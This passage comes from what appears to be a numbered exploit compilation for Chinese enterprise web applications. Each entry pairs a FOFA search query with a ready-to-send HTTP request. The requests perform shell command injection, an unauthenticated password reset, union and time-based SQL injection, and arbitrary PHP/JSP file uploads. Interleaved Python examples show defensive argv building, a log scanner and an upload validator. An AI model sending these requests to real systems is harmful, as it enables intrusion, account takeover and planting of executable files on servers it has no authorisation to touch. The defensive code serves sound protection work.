FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

The name field is spliced into a shell command line: the leading ; terminates the intended command, uname -a runs, and the trailing echo swallows whatever the CGI appends.


196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host: your-ip
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

The request carries no session or credentials; xgh is the target account's user ID and newPass the password it will be given.


197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

The ;.js path suffix is a filter-bypass trick of the same kind as in entry 191 (the auth filter sees a static .js resource, the container strips the path parameter); 12321 (111*111) in the response confirms the union injection.


198. 阿里云盘 WebDAV (aliyundrive-webdav LuCI app) command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Host: your-ip
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

The sid value decodes to `ls />/www/aaa.txt` (backtick command substitution), writing the directory listing to a web-served path; the request requires a valid LuCI sysauth session cookie.

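Entries 193, 195 and 198 share one root cause: a request parameter ends up inside a command line that a shell (or, for 193, an interpreter) executes. The following is an added example, not code from the original compilation or from any of those products; /usr/sbin/order_tool is a hypothetical stand-in for the real backend helper. It shows what a shell does with the two payloads from this page and the argv-plus-allowlist pattern that makes them inert.

```python
from __future__ import annotations

import re
import shlex
import subprocess

# Payloads from this page: the "name" field of entry 195 and the URL-decoded
# "sid" parameter of entry 198 (%60%6c%73... -> `ls />/www/aaa.txt`).
PAYLOAD_195 = ";uname -a;echo "
PAYLOAD_198 = "`ls />/www/aaa.txt` "

TOOL = "/usr/sbin/order_tool"  # hypothetical backend binary (assumption, not from the page)

SHELL_SEPARATORS = re.compile(r"\s*(?:;|&&|\|\||\||&)\s*")
SHELL_META = re.compile(r"[;&|`$<>(){}\n]")


def vulnerable_command(name: str) -> str:
    """The string a vulnerable handler builds and hands to os.system()/popen():
    the request parameter is spliced into the shell command line unescaped."""
    return f"{TOOL} --name {name}"


def commands_in(shell_line: str) -> list[list[str]]:
    """Split a shell line on command separators and tokenise each piece, to show
    how many commands the shell would actually run. Backtick and $() substitution
    are not modelled here; SHELL_META flags those characters instead."""
    return [shlex.split(part) for part in SHELL_SEPARATORS.split(shell_line) if part.strip()]


def injected_command_count(name: str) -> int:
    """How many extra commands the vulnerable path would run for this input."""
    return len(commands_in(vulnerable_command(name))) - 1


NAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")


def safe_argv(name: str) -> list[str]:
    """Hardened version: allowlist-validate the parameter, then build argv.
    No shell is involved, so separators and substitutions stay inert even
    if the regex were later loosened."""
    if not NAME_RE.fullmatch(name):
        raise ValueError(f"rejected parameter: {name!r}")
    return [TOOL, "--name", name]


def run_safe(name: str) -> subprocess.CompletedProcess:
    # shell=False hands argv straight to execve; nothing re-parses it.
    return subprocess.run(safe_argv(name), shell=False, capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    for p in (PAYLOAD_195, PAYLOAD_198):
        print(repr(p), "extra commands:", injected_command_count(p),
              "shell metachars:", bool(SHELL_META.search(p)))
        try:
            safe_argv(p)
        except ValueError as exc:
            print("  hardened handler:", exc)
```

The separator count alone misses the entry 198 payload (no ; or |, only backticks), which is why the hardened path does not try to blocklist characters: it allowlists the value and never invokes a shell.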
199. Cockpit CMS assetsmanager/upload file upload (authenticated)
FOFA:title="Authenticate Please!"
Run the steps in order: fetch the CSRF token, exchange it plus a login for a session cookie, upload, then request the stored file.

1. Request the login page to obtain the CSRF token (the JSON key is literally csfr):
GET /auth/login?to=/ HTTP/1.1
Host: your-ip

Response: 200, containing csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT from step 1 together with a valid login (the PoC uses the default admin/admin) to obtain a session cookie:
POST /auth/check HTTP/1.1
Host: your-ip
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload with that session cookie; the asset manager keeps the client's file name and extension:
POST /assetsmanager/upload HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

4. Request the stored file; "tttt" in the response confirms execution (the sample deletes itself on first run):
/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Host: your-ip
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

Decoded, TableName is: DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5';select DOM_IMAGE from IMG_LARGE_PATH. The parameter is concatenated straight into the FROM clause of a SQL Server query, so stacked statements run.
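Most of the SQL injection and file-read entries in this compilation (186, 187, 189, 190, 191, 197, 200, 201) leave distinctive strings in the request line or body. The scanner below is an added example, not part of the original compilation or of any product named here; it applies narrow indicator rules to URL-decoded requests. The log lines are constructed for the example (targets copied from entries 189, 188, 200 and 191), and the POST body is assumed to come from a WAF or reverse proxy that logs bodies, since a plain access log does not.

```python
from __future__ import annotations

import re
from urllib.parse import unquote_plus

# One rule per indicator family. They run on the URL-decoded, lower-cased
# request target plus (where a proxy/WAF logs it) the POST body.
RULES = [
    # time-based SQL injection probes (entries 186, 187, 189, 191, 200, 201)
    ("sqli_sleep", re.compile(r"\bsleep\s*\(\s*\d+\s*\)")),             # MySQL SLEEP(n)
    ("sqli_waitfor", re.compile(r"\bwaitfor\s+delay\s+'?\d+:\d+:\d+")),  # MSSQL WAITFOR DELAY
    ("sqli_randomblob", re.compile(r"\brandomblob\s*\(")),              # SQLite heavy query
    # union injection (entries 197, 201)
    ("sqli_union", re.compile(r"\bunion\s+(all\s+)?select\b")),
    # arbitrary file read (entries 188, 190)
    ("file_read_passwd", re.compile(r"/etc/passwd")),
    ("file_read_scheme", re.compile(r"\bfile:///")),
    # traversal used to reach a filtered servlet (entry 191: /js/../NavigationAjax)
    ("path_dotdot", re.compile(r"(^|/)\.\./")),
]

# Combined-log-format request line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def normalise(s: str) -> str:
    """URL-decode twice (catches double encoding) and lower-case."""
    return unquote_plus(unquote_plus(s)).lower()


def scan(log_line: str, body: str = "") -> list[str]:
    """Names of every rule that fires on one request (log line plus optional body)."""
    m = REQUEST_RE.search(log_line)
    target = m.group("target") if m else log_line
    haystack = normalise(target) + "\n" + normalise(body)
    return [name for name, rx in RULES if rx.search(haystack)]


def scan_log(lines: list[str], bodies: dict[int, str] | None = None) -> dict[int, list[str]]:
    """Map line index -> fired rules, for every line that matched at least one rule."""
    bodies = bodies or {}
    hits: dict[int, list[str]] = {}
    for i, line in enumerate(lines):
        fired = scan(line, bodies.get(i, ""))
        if fired:
            hits[i] = fired
    return hits


# Constructed sample traffic (not real logs). Request targets are copied from
# entries 189, 188, 200 and 191 above; the last line is ordinary traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jun/2024:10:00:01 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jun/2024:10:00:02 +0800] "GET /attachment?file=/etc/passwd HTTP/1.1" 200 2048',
    '10.0.0.5 - - [01/Jun/2024:10:00:03 +0800] "GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1" 200 17',
    '10.0.0.5 - - [01/Jun/2024:10:00:04 +0800] "POST /CDGServer3/js/../NavigationAjax HTTP/1.1" 200 88',
    '10.0.0.7 - - [01/Jun/2024:10:00:05 +0800] "GET /index.php?page=sleep_tips HTTP/1.1" 200 4096',
]
# Body of the entry 191 request, as a body-logging proxy would record it.
SAMPLE_BODIES = {3: "command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId="}

if __name__ == "__main__":
    for idx, fired in scan_log(SAMPLE_LOG, SAMPLE_BODIES).items():
        print(f"line {idx}: {', '.join(fired)}")
```

The rules are deliberately narrow (SLEEP must be followed by a parenthesised number, WAITFOR must be followed by DELAY and a time literal) so that ordinary pages such as the sleep_tips line in the sample do not fire; widen them only with a corresponding false-positive review.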

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Fetch the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Substitute the fetched __VIEWSTATE and __EVENTVALIDATION values into the upload request:
POST /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The uploaded file is then served from:
/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

The part's Content-Type claims image/jpeg while the file name and body are a JSP; the handler checks neither, so the file is stored with its .jsp extension.
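Entries 192, 194, 199, 202 and 203 all rely on the server trusting the client-supplied file name: an executable extension (.ashx, .jsp, .php), a traversal prefix (../../../../../jboss/web/fe.war/), or an extension smuggled in a query parameter (?name=.ashx). The validator below is an added example and not code from the original compilation or from any of those products; /srv/uploads is an assumed storage directory. It runs the file names from these PoCs through the checks an upload handler should make before touching the filesystem.

```python
from __future__ import annotations

import posixpath
import re
import secrets

UPLOAD_ROOT = "/srv/uploads"  # assumed storage directory, outside the web root (not from the page)
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".txt"}
# Server-executable extensions; rejected anywhere in the name so that
# "x.jsp.txt"-style names fail too.
EXECUTABLE_EXT = re.compile(r"\.(jspx?|php\d?|phtml|as[hp]x|asp|cer|war|jar)(\.|$)", re.I)
MAGIC = {b"\xff\xd8\xff": ".jpg", b"\x89PNG\r\n\x1a\n": ".png", b"GIF8": ".gif", b"%PDF": ".pdf"}
SCRIPT_MARKERS = (b"<%", b"<?php", b"<?=")


class UploadRejected(ValueError):
    pass


def validate_upload(filename: str, data: bytes, upload_root: str = UPLOAD_ROOT) -> str:
    """Return the server-chosen storage path for an upload, or raise UploadRejected.

    The client's name is consulted only for the intended extension; the
    directory and the stored name are decided here."""
    # 1. Refuse NUL bytes, strip any directory part (either separator), and
    #    refuse anything that still looks like traversal or a dotfile.
    if "\x00" in filename:
        raise UploadRejected("NUL byte in file name")
    base = posixpath.basename(filename.replace("\\", "/"))
    if not base or base.startswith(".") or ".." in base:
        raise UploadRejected("bad file name")
    # 2. Deny executable extensions outright, then apply the allowlist.
    if EXECUTABLE_EXT.search(base):
        raise UploadRejected("executable extension")
    ext = posixpath.splitext(base)[1].lower()
    if ext not in ALLOWED_EXT:
        raise UploadRejected("extension not allowed")
    # 3. The Content-Type header is attacker-controlled (entry 203 sends
    #    image/jpeg for a JSP), so check the bytes, not the header.
    sniffed = next((e for magic, e in MAGIC.items() if data.startswith(magic)), None)
    expected = ".jpg" if ext == ".jpeg" else ext
    if ext != ".txt" and sniffed != expected:
        raise UploadRejected("content does not match extension")
    if ext == ".txt" and any(marker in data.lower() for marker in SCRIPT_MARKERS):
        raise UploadRejected("script markers in text upload")
    # 4. Random server-side name; the original name is metadata only.
    return posixpath.join(upload_root, secrets.token_hex(16) + ext)


# File names taken from the upload PoCs on this page (entry 192 supplies the
# extension via ?name=.ashx, so the effective name is just ".ashx").
PAGE_FILENAMES = {
    "192": ".ashx",
    "194": "../../../../../jboss/web/fe.war/hello.jsp",
    "199": "tttt.php",
    "202": "1123.txt",
    "203": "11.jsp",
}


def check_page_filenames(data: bytes = b"Hello World!") -> dict[str, str]:
    """Run every PoC file name through the validator with a harmless body."""
    results: dict[str, str] = {}
    for entry, name in PAGE_FILENAMES.items():
        try:
            validate_upload(name, data)
            results[entry] = "accepted"
        except UploadRejected as exc:
            results[entry] = f"rejected: {exc}"
    return results


if __name__ == "__main__":
    for entry, verdict in check_page_filenames().items():
        print(entry, PAGE_FILENAMES[entry], "->", verdict)
```

Only the entry 202 name (1123.txt with a plain-text body) passes, and even then it is stored under a random name, so a later request for the original name cannot reach it. Storing outside the web root and serving through a handler that sets a fixed Content-Type closes the remaining path to execution.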
